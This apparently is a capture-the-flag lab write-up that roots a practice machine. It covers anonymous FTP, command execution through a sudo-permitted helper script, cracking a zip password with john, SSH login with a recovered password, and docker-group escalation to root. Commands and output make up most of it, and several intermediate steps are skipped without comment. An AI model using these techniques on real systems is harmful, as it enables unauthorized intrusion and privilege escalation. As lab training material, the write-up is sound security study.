Let's run a simple nmap scan against the target machine.
$ nmap -sC -sV 10.10.159.234
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-14 13:23 IST
Nmap scan report for 10.10.159.234
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.48.138
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
| 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Game Info
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.15 seconds
There are three open ports:
Port
Service
21
ftp
22
ssh
80
http
We can connect anonymously through FTP.
$ ftp anonymous@10.10.159.234
Connected to 10.10.159.234.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
There is a note.txt file that we can download on our machine using the get command.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||62537|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |***********************************************************************************************************************************************************************************************| 90 348.77 KiB/s 00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (0.68 KiB/s)
Let's cat out the note.txt file.
$ cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
So there is some page where we can input commands which are then filtered.
Let's try to find out the page where this is happening using gobuster.
Let's chat files the www-data user can run using sudo.
www-data@ubuntu:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
Let's take a better look at what the .helpline.sh file does.
www-data@ubuntu:/home$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash
echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person, Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"
So it uses the /bin/bash interpreter for all of the user input. Which means we we should be able to get a shell.
www-data@ubuntu:/var/www/files/images$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: knign
knign
Hello user! I am knign, Please enter your message: /bin/bash
/bin/bash
id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
apaar@ubuntu:/var/www/files/images$
$ john --wordlist=/usr/share/wordlists/rockyou.txt backup_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2023-12-14 15:18) 4.166g/s 51200p/s 51200c/s 51200C/s horoscope..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Let's unzip the file using the pass1word password.
We can now login through SSH as the user anurodh using the !d0ntKn0wmYp@ssw0rd password.
$ ssh anurodh@10.10.159.234
The authenticity of host '10.10.159.234 (10.10.159.234)' can't be established.
ED25519 key fingerprint is SHA256:mDI9eoI+sD1gmuE1Vl2iLvyVIopHnZlbAEFxr82BFwc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.159.234' (ED25519) to the list of known hosts.
anurodh@10.10.159.234's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Dec 14 09:53:01 UTC 2023
System load: 0.08 Processes: 134
Usage of /: 24.8% of 18.57GB Users logged in: 0
Memory usage: 22% IP address for eth0: 10.10.159.234
Swap usage: 0% IP address for docker0: 172.17.0.1
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
19 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
anurodh@ubuntu:~$
Using the id command we can check the groups that the anurodh user is part of.
anurodh@ubuntu:~$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
So the anurodh user is part of the docker group.
We can find an exploit for Docker on GTFOBins.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Let's use the exploit without the sudo.
anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
We are now the root user and can read the root flag.